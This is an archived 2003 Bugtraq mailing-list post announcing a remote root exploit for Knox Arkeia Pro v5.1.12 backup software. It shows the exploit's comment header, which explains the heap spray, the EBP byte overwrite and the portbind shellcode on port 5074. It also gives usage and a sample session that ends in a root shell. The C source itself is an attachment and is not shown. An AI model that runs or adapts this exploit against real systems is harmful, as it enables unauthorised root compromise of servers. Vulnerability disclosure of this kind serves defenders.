Message-ID: <20030918230614.46980.qmail@web20503.mail.yahoo.com>
Date: Thu, 18 Sep 2003 16:06:14 -0700 (PDT)
From: "A. C." <bugtraq_vuln@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Knox Arkeia Pro v5.1.12 remote root exploit

Exploit attached for Knox Arkeia Pro v5.1.12 backup
software from http://www.arkeia.com.

 
 

/*
 * Knox Arkeia arkiead local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
 *
 * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
 * A previous request forces a large allocation of NOP's + shellcode in heap
 * memory.  Find additional targets by searching the heap for NOP's after a
 * crash.  safeaddr must point to any area of memory that is read/writable
 * and won't mess with program/shellcode flow.
 *
 * ./ark_sink host targetnum
 * [user@...t dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *
 */
 

View attachment "ark_sink.c" of type "text/plain" (5556 bytes)
